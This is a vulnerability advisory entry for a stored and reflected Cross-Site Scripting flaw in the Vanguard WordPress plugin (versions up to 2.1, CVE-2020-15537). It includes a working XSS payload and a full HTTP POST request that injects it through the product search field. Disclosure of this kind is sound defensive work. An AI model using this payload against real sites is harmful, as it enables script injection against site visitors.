Lucene search
WpvulndbWPEX-ID:7615801D-F399-4DC7-BB0B-41877C8CBB3BHistoryApr 06, 2020 - 12:00 a.m.
Vanguard <= 2.1 - Multiple Cross-Site Scripting (XSS)
2020-04-0600:00:00
wpvulndb
25
0.021 Low
EPSS
Percentile
89.2%
The plugin does not sanitise, validate or escape some of its parameters before outputting the back in various place, leading to either Stored or Reflected Cross-Site Scripting issues
Put the following payload in the In Products Search box: "><img src=x onerror=prompt(/XSS/);>
POST /search HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Connection: close
Upgrade-Insecure-Requests: 1
phps_query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E&phps_search=References
Related
nvd
nvd
CVE-2020-15537
2020-07-05 16:15:10
cvelist
cvelist
CVE-2020-15537
2020-07-05 15:13:47
wpvulndb
wpvulndb
Vanguard <= 2.1 - Multiple Cross-Site Scripting (XSS)
2020-04-06 00:00:00
cve
cve
CVE-2020-15537
2020-07-05 16:15:10
prion
prion
Design/Logic Flaw
2020-07-05 16:15:00